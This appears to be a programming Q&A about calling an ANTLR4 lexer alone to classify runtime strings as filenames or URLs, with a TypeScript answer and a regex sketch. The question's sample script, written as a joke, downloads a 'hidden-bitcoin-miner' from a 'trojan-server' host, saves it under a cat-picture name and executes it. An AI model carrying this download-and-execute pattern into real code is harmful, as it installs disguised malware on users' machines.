I have an ANTLR4 grammar that contains tokens for "filenames" and "URLs" but the language also includes strings and string expressions (which might turn out to be filenames or URLs). Is there a good way to call just the tokenizer on some string in my interpreter and see if the string is a filename or URL according to my token rules? I just want to special case those cases where the script I am interpreting has created one of those things on the fly, so I can treat such strings specially.
lexer // this I already have (or something like this)
FileName: ([A-Za-z]':')?('\\'?[-_.A-Za-z0-9]+)+ ;
URL: ([A-Za-z]+':')?'/'?('/'?[-_.A-Za-z0-9]+)+ ;
Interpreter.java
public boolean isFileName(String string) {
return antlr.lexer.token(string).type == FileName; // this is the magic I want
}
Script // this is what I am looking to understand
# you get cat pictures, I get paid...
url = 'https://trojan-server.com/hidden-bitcoin-miner';
fn = 'c:' + programdirectory() + 'show-cat-pictures.exe';
download(url, fn);
exec(fn);
As I understand the question, you would like the interpreter actions that receive strings constructed at runtime to be able to use your lexer to determine whether those strings are URLs or file references.
Something like this:
doDownloadAction(source: string, dest: string) {
if (isFilename(source)) {
One answer would be to just fire up a new lexer fed by your string, the same way you do when you start a parse, but with no parser attached. Something like this (in TypeScript, sorry, it's what I use for ANTLR):
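import {LMLexer} from "./LMLexer";
import {CharStreams, Token} from "antlr4ts";
function isFilename(txt: string) {
    // Lex the string on its own; no parser is needed.
    const stringLexer = new LMLexer(CharStreams.fromString(txt));
    const first = stringLexer.nextToken();
    // The first token must be a FileName and must consume the whole string,
    // so the token after it has to be EOF.
    return first.type === LMLexer.FileName && stringLexer.nextToken().type === Token.EOF;
}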
for ( const str of [ "C:\\Users\\Tony\\file.txt", "http://stackoverflow.com" ]) {
console.log(str, isFilename(str) ? "is" : "is not", "a filename");
}
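The snippet above needs your generated lexer to run, so here is a self-contained sketch of how the two rules from the question should classify a whole string. It is only a stand-in: `FILE_NAME` and `URL_RULE` are hand-written regex translations of the `FileName` and `URL` rules (flattened to avoid nested repetition), and `classify`, `SEGMENT`, and `TokenKind` are hypothetical names, not part of ANTLR. It also assumes no other rule in your grammar matches the same text. ANTLR lexers pick the longest match and, when two rules match the same length, the rule listed first, which is why `FileName` is tested before `URL` here.

```typescript
// Regex stand-ins for the two lexer rules in the question (assumption:
// hand-translated approximations, not generated by ANTLR).
const SEGMENT = "[-_.A-Za-z0-9]+";

// FileName: ([A-Za-z]':')?('\\'?[-_.A-Za-z0-9]+)+
// Flattened to: optional drive, optional leading backslash, one segment,
// then any number of backslash-prefixed segments.
const FILE_NAME = new RegExp(`^(?:[A-Za-z]:)?\\\\?${SEGMENT}(?:\\\\${SEGMENT})*$`);

// URL: ([A-Za-z]+':')?'/'?('/'?[-_.A-Za-z0-9]+)+
// Flattened to: optional scheme, up to two slashes, one segment,
// then any number of slash-prefixed segments.
const URL_RULE = new RegExp(`^(?:[A-Za-z]+:)?/?/?${SEGMENT}(?:/${SEGMENT})*$`);

type TokenKind = "FileName" | "URL" | null;

// Classify a whole string. FileName is checked first because it is listed
// first in the grammar, so it wins when both rules match the full string.
function classify(txt: string): TokenKind {
    if (FILE_NAME.test(txt)) return "FileName";
    if (URL_RULE.test(txt)) return "URL";
    return null;
}

for (const str of ["C:\\Users\\Tony\\file.txt", "http://stackoverflow.com", "file.txt", "hello world"]) {
    console.log(str, "->", classify(str));
}
```

Note that a bare name such as `file.txt` matches both rules, so with the grammar as written it would come back as a `FileName`. If that is not what you want, the rules themselves need to be made less ambiguous.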